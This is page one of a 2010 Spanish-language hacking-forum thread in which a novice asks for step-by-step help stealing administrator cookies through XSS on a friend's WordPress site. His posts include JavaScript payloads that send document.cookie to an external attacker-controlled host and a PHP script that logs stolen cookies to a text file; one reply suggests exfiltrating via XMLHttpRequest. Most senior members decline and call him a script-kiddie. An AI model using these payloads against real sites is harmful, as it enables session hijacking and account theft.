Página 1 de 2 12 ÚltimoÚltimo
Resultados 1 al 20 de 33

Tema: ayuda con vulnerabilidad xss

  1. #1 ayuda con vulnerabilidad xss 
    Iniciado
    Fecha de ingreso
    Oct 2010
    Mensajes
    8
    Descargas
    0
    Uploads
    0
    Buenos dias , gente de hackispano, e venido por aca ya que en otras comundades la verdad no me an ayudado ! =( y necesito ayuda ! BUENO AQUI LE SPONGO MIS DUDAS !

    Bueno , pues ya logre un gran avanze en lo que corresponde a inyecciones xxs ( crosse site scripting ) y inyecciones html , Bueno ahroa tengo una duda . Tengo la pagina de un amigo por ejemplo crashh.me/wordspress y e logrado encontrar varias vulberabilidades xxs principalmente *, ahi subo algunas fotos





    Pues logre hacer los tres ataques xxs , por lo que se que la pagina es vulnerable verdad , aunque la pregunta ahora seria que hacer verdad ! =)

    " posdata : El dueño de la pagina es mi amigo , asi que no quiero hacerle ningun daño , a la pagina es tan solo algo como personal que tenemos entre el yo yo ! =) " asi que por eso no se preocupen , es tan solo *por diversion y para mostrarle que se puede ! "

    BUENO SIGAMOS *

    Pues , estaba leyendo y lo que debo hacer ahora es instalar *UN CODIGO SCRIPT COMO ESTE




    para robar las cookies y asi poder , sacar la pass del administrador verdad ! La foto me quedo un poco mal , pero creo se pueda entender !

    --------------------------------------------------------------------------

    Pues como ya les habia mensionado haber si alguien me ayuda con una guia paso a paso de como robar LOS COOKIES , en una pagina web vulnerable a xss ! Si alguien me quisiera ayudar , pues bienvenido sea ! Un saludo y desde ya gracias !.

    Bueno pues tampoco soy tan comodo de venir a pedir sin antes almenos haber leido ! =)

    Bueno pues , lo de robar cookies por xss , lo se todo en teoria ! Osea en una pagina , que es vulnerable a xss y los comentarios estan habilitados .

    Primero deberia crearme un dominio web en el cual se enviarian las cookies verdad ! BUENO YA LO HIZE Y ES ESTE



    y ahi deberia pone en un coment de la pagina este codigo

    javascript:void(document.location="http://hackedbyjustinxzibit.t35.com/cookie.php?c="+document.cookies)

    para que envie las cookies a la direccin mencionada !

    AQUI ES LA PARTE QUE NO ENTIENDO!... , SI ESTA BIEN ESE SCRITP Y DEBE SER COLOCADO EN LOS COMENTARIOS ! Y SI EN EL DOMIINIO WEB CREADO SE DEBE CREAR UN DIRECTORIO . O UN ARCHIVO CON UN NUEVO CODIGO , PUES AHI STA TODO , sI ALGUIEN ME QUIERE AYUDAR , LE AGRADECERIA UN MONTON LA VERDAD ! un saludo a toda la comunidad !
    ! [B] QUERER APRENDER ES LEER , ! INVESTIGAR Y CUANDO NO MISMO ENTIENDES AHI SI APRENDE [B]
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Podrás robar las cookies, con eso podrás acceder al panel de administración, pero ni mucho menos podrás conseguir la clave. Hazte un .js que saque las cookies y las mande por XMLHttpRequest (yo tenía uno, no sé si lo conservo) y listos, se lo pasas a la persona a la que quieras suplantar.
     

  3. #3 Gracias por responder 
    Iniciado
    Fecha de ingreso
    Oct 2010
    Mensajes
    8
    Descargas
    0
    Uploads
    0
    Pues exactamente eso es lo que no puedo , no se como robarle las cookies ! Y ya se me esta matando la cabeza ! =) Si me lo podrias explicar te juro que te lo agradeceria un monton Y me uniria de lleno a esta comunidad ! aportanto mis conocimientos que no son muchos pero creo que ayudarian


    Un saludo a todos
    Última edición por crashh; 22-10-2010 a las 02:07
    ! [B] QUERER APRENDER ES LEER , ! INVESTIGAR Y CUANDO NO MISMO ENTIENDES AHI SI APRENDE [B]
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Borra el mail.

    Te daré dos pistas:
    document.cookie
    http://www.w3schools.com/XML/xml_http.asp

    Obviamente necesitarás también un servidor web.
     

  5. #5  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    Creía que la gente ya no jugaba a Ikariam xD Te recomiendo la proxima vez que cuando hagas un screenshot que cierres las pestañas. Al menos eso es lo que hago yo

    Interesante, Fruit...

    Un saludo.
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
     

  6. #6  
    Iniciado
    Fecha de ingreso
    Oct 2010
    Mensajes
    8
    Descargas
    0
    Uploads
    0
    Pues lo de las pestañas ! Lo hare , =)

    ALGUIEN ME PUEDE EXPLICAR ESTO !

    Para almacenar las cookies, tenemos dos opciones

    1º Almacenarlas en una base de datos (MySql).
    2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"

    A continuación vamos a crear una pagina en php, [" con una pagina web se refiere a un dominio web !???]

    este archivo creará otro (archivo.txt)
    cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
    usuarios:

    [ si ya tengo un dominio web , creo como directorio el archivo .txt y en el interior creo un archivo con el codigo de mas abajo ?]

    Código:
    <?
    $cookie = $_GET['cookie'];
    $fff = fopen("archivo.txt","a");
    fwrite($fff, "$cookie \n");
    fclose($fff);
    ?>


    ARCHIVO.TXT
    Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
    que para ver los resultados tienes que entrar en este archivo.

    Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:

    Citación:
    http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
    'http://www.atacante.com/cookies.php?cookie='+document·cookie;</script>&buscar=;


    si alguien me explica eso , seria mas que suficiente , QUE ES PARA ROBAR COOKIES MEDIANTE XSS




    " ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

    <?
    $cookie = $_GET['cookie'];
    $fff = fopen("archivo.txt","a";
    fwrite($fff, "$cookie \n";
    fclose($fff);
    ?>

    pero ya lo guardo voy al index y me bota este error cuando quiero abrirlo

    Parse error: syntax error, unexpected ';' in /home/freehost/t35.com/h/a/hackedbyjustinxzibit/cookies.php/cookies.php on line 8

    si alguien sabe algun seria de gran utilidad un saludo !
    Última edición por crashh; 22-10-2010 a las 21:33 Razón: Falto agregar algo!
    ! [B] QUERER APRENDER ES LEER , ! INVESTIGAR Y CUANDO NO MISMO ENTIENDES AHI SI APRENDE [B]
     

  7. #7  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Disculpe, pero me parece que es usted un script-kiddie, así que hasta aquí llegó mi participación en este hio.
     

  8. #8  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    Cita Iniciado por Fruit Ver mensaje
    Disculpe, pero me parece que es usted un script-kiddie, así que hasta aquí llegó mi participación en este hio.
    Yo igual. En este mundo no hay sitio para este tipo de gente.

    Si ni siquiera sabes tu definición, yo te la doy, no hay problema.

    http://es.wikipedia.org/wiki/Script_Kiddie

    0,5 Saludos.
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
     

  9. #9  
    Iniciado
    Fecha de ingreso
    Oct 2010
    Mensajes
    8
    Descargas
    0
    Uploads
    0
    Pues lastima ! =( Que piensen eso , bueno no hay problema , pero no por eso dejare esta comunidad ! Seguire leyendo pstda: ese script lo puse porque me fije en ese tutorial

    http://taringa.net/posts/ebooks-tuto..._ejemplos.html

    Pero gracias de todas formas " si algun moderador podria serrar el hilo "
    ! [B] QUERER APRENDER ES LEER , ! INVESTIGAR Y CUANDO NO MISMO ENTIENDES AHI SI APRENDE [B]
     

  10. #10  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Venga, aquí dejo para serrar el hilo.

     

  11. #11  
    Moderador Global Avatar de hystd
    Fecha de ingreso
    Jul 2005
    Ubicación
    1, 11, 21, 1211...
    Mensajes
    1.596
    Descargas
    58
    Uploads
    0
    A continuación vamos a crear una pagina en php, [" con una pagina web se refiere a un dominio web !???]
    ¿Qué diferencia hay entre una página web y un dominio? Dilo tú, ya que seguro que si eres capaz de hacer un XSS, por lo menos sabrás qué es cada cosa...

    http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
    'http://www.atacante.com/cookies.php?cookie='+document·cookie;</script>&buscar=;
    ¿Sabes lo que hace un window.location en javascript? Si es así, no habría problemas en saber la respuesta a tu 1ª pregunta.

    1º Almacenarlas en una base de datos (MySql).
    2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"
    Podrías explicar por qué es tan lógico para ti almacenarlo en un fichero de texto en vez de en una BD?

    " ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

    <?
    $cookie = $_GET['cookie'];
    $fff = fopen("archivo.txt","a";
    fwrite($fff, "$cookie \n";
    fclose($fff);
    ?>

    pero ya lo guardo voy al index y me bota este error cuando quiero abrirlo

    Parse error: syntax error, unexpected ';' in /home/freehost/t35.com/h/a/hackedbyjustinxzibit/cookies.php/cookies.php on line 8
    ¿Podrías explicarnos a todos que es lo que hace ese código y si está correcto?.

    Si respondes a estas preguntas y estamos conformes con las respuestas, entonces hablamos.

    Un saludo.
    El optimista tiene ideas, el pesimista... excusas

     

  12. #12  
    Iniciado
    Fecha de ingreso
    Oct 2010
    Mensajes
    8
    Descargas
    0
    Uploads
    0
    Bueno , pues primeramente quisiera disculparme con toda la Comunidad , creo sone como un " lammer " que se cree que sabe todo y me parece que eso di a conocer ! Pues , lo que ponia eran tutos que me bajaba y esas eran las partes que no entendia ! Pero comienzo a responder todas las cosas que a dicho " una persona que no critica sino se asesora de todo antes de jusgar ".

    ¿Qué diferencia hay entre una página web y un dominio? Dilo tú, ya que seguro que si eres capaz de hacer un XSS, por lo menos sabrás qué es cada cosa...

    Bueno , pues esa parte , si esta mal de mi parte ! Y xss aprendi leyendo manuales cosas como <h1>hola , haciendo alertas como <script>alert("hola");</script> y asi poder ver si esque la pagina es vulnerable !

    ¿Sabes lo que hace un window.location en javascript? Si es así, no habría problemas en saber la respuesta a tu 1ª pregunta.

    UN WINDOWS LOCATION es en donde sera redirigida la pagina ! " no estoy seguro [ pero tampoco me pondre a buscar ahora ! para que digan que se ! ]


    º Almacenarlas en una base de datos (MySql).
    2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"


    LA SEGUNDA ARE LOGICAMENTE PORQUE ES MUCHO MAS FACIL GUARDARLA EN UN ARCHIVO TXT , QUE EN UNA BASE DE DATOS !



    " ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

    <?
    $cookie = $_GET['cookie']; " ////CONSEGUIR LA COOKIE "
    $fff = fopen("archivo.txt","a"; ///" CREAR UN ARCHIVO TXT EN EL DIRECTORIO
    fwrite($fff, "$cookie \n"; ///GUARDAR LA COOKIE ,
    fclose($fff); ///CERRAR EL SCRIPT
    ?>


    Bueno eso es lo que se , y la neta no creo se casi nada ! YA QUE ME FALTA UN MUNDO POR LEER , tan solo venia aqui haber si me ayudabn con la creacion del directorio para crear el archivo txt para guardar la cookie , nada mass ! PERO CREO ME HICE ENTENDER MAL !
    Un saludo a todos
    ! [B] QUERER APRENDER ES LEER , ! INVESTIGAR Y CUANDO NO MISMO ENTIENDES AHI SI APRENDE [B]
     

  13. #13  
    Moderador Global Avatar de hystd
    Fecha de ingreso
    Jul 2005
    Ubicación
    1, 11, 21, 1211...
    Mensajes
    1.596
    Descargas
    58
    Uploads
    0
    Cuando se quiere aprender, hay dos formas de actuar:

    1º Experimentar sin tener conocimiento de la teoria y aprender en base a los resultados.
    2º Plantear una hipotésis, fundamentada en base a unas teorias y afirmarla o negarla en función de los resultados experimentales.

    Como intuirás, la primera no suele ser buena (salvo mínimas excepciones), ya que uno para experimentar, forzosamente parte de unos conocimientos previos... si no, ¿cómo lleva a cabo el experimento?.

    Bueno, pues antes de hacer un XSS, te aconsejo que investigues sobre el tema. La cantidad de información que leas será directamente proporcional a las ganas que tengas de conseguir hacer un XSS.

    P.D. (Y esto te lo respondo porque no tiene nada que ver con el XSS):

    Un domino es un nombre que permite traducir la dirección IP de un servidor.
    Una página web es un código (siempre HTML) que se invoca, se crea y se ejecuta cuando se accede a un servidor web.

    Ejemplo: Acceder a http://72.14.235.104/ es lo mismo que acceder a http://www.google.com, con la ventaja de que la conexión al primero es mucho más rápida que al segundo... ¿por qué es más rápida?, entonces si es más rápida, ¿por qué se utiliza normalmente la segunda forma?.

    Un saludo.
    Última edición por hystd; 23-10-2010 a las 14:47
    El optimista tiene ideas, el pesimista... excusas

     

  14. #14  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    uamain mon mina mandan

    bueno

    <?
    $cookie = $_GET['cookie'];
    $fff = fopen("archivo.txt","a";
    fwrite($fff, "$cookie \n";
    fclose($fff);
    ?>
    uamain min mina mandan

    umm

    la sintaxis u,m (yo no e dixo naa XD)

    Pd: No intentes hacer la casa por el tejado, te lo digo por experiencia, primero aprende algo de java script y php, no hace falta que te los estudios a fondo, solo con adquirir unos conocimientos basicos ya te servira para lo que quieres hacer y muchas cosas mas.
     

  15. #15  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Cita Iniciado por crashh Ver mensaje
    LA SEGUNDA ARE LOGICAMENTE PORQUE ES MUCHO MAS FACIL GUARDARLA EN UN ARCHIVO TXT , QUE EN UNA BASE DE DATOS !
    No creas... lo malo es que tienes que disponer de una base de datos, pero si ya la tienes, es coser y cantar.

    Se te llama script-kiddie porque quieres crackear algo usando un código copypasteado de un sitio. Y por no saber no sabes ni qué hace.
     

  16. #16  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0

    Se te llama script-kiddie porque quieres crackear algo usando un código copypasteado de un sitio. Y por no saber no sabes ni qué hace.

    Yo creo que el solo quiere aprender, deveriamos de ayudarle y no limitarnos a llamarle script-kiddie, a mi no se me permite poner enlaces asi que nada (normas del foro xd), pero estaria bien que le pasaran algun tutorial de html, php y java script.


    No creas... lo malo es que tienes que disponer de una base de datos, pero si ya la tienes, es coser y cantar.
    Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.
    Última edición por chewarrior; 23-10-2010 a las 17:21
     

  17. #17  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Cita Iniciado por chewarrior Ver mensaje
    Yo creo que el solo quiere aprender, deveriamos de ayudarle y no limitarnos a llamarle script-kiddie, a mi no se me permite poner enlaces asi que nada (normas del foro xd), pero estaria bien que le pasaran algun tutorial de html, php y java script.
    Tú sí puedes poner enlaces, lo que no puedes es subir archivos.
    Cita Iniciado por chewarrior Ver mensaje
    Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.
    INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');
     

  18. #18  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');
    Eso sera desde la consola,porque si lo piensas hacer asi en php, esta pero que listo xd.
     

  19. #19  
    Moderador Global Avatar de hystd
    Fecha de ingreso
    Jul 2005
    Ubicación
    1, 11, 21, 1211...
    Mensajes
    1.596
    Descargas
    58
    Uploads
    0
    Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.
    Según lo que dices utilizando ficheros, tienes que abrirlo, escribir y cerrarlo y además saber tratar ficheros.
    Utilizar un fichero, según el código anterior, ocupa 4 líneas. En el caso de una BD... sólo 3. Por tanto creo más fácil utilizar BD si, como bien dice Fruit, esa BD ya existe.

    INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');
    Eso sera desde la consola,porque si lo piensas hacer asi en php, esta pero que listo xd.
    ¿Cual es el problema? Dilo y así aprendemos todos.

    Un saludo.
    Última edición por hystd; 23-10-2010 a las 18:24
    El optimista tiene ideas, el pesimista... excusas

     

  20. #20  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Cita Iniciado por hystd Ver mensaje
    Según lo que dices utilizando ficheros, tienes que abrirlo, escribir y cerrarlo y además saber tratar ficheros.
    Utilizar un fichero, según el código anterior, ocupa 4 líneas. En el caso de una BD... sólo 3. Por tanto creo más fácil utilizar BD si, como bien dice Fruit, esa BD ya existe.
    Y eso por no hablar de las race conditions y de lo lenta que se hace la navegación por un archivo cuando ya se ha alcanzado cierto número de líneas.
     

Temas similares

  1. ayuda con vulnerabilidad
    Por TYLER-_- en el foro VULNERABILIDADES
    Respuestas: 6
    Último mensaje: 03-11-2008, 00:27
  2. Nueva vulnerabilidad en el sistema de ayuda de Windows
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 10-04-2004, 16:21
  3. Vulnerabilidad en HP-UX 10.20, 11.00 y 11.11
    Por |RooT| en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 25-02-2003, 12:58
  4. Vulnerabilidad CGI
    Por Rojodos en el foro GENERAL
    Respuestas: 0
    Último mensaje: 03-09-2002, 13:42
  5. Vulnerabilidad...PHP
    Por NeoGenessis en el foro HACK HiSPANO
    Respuestas: 0
    Último mensaje: 01-03-2002, 19:32

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •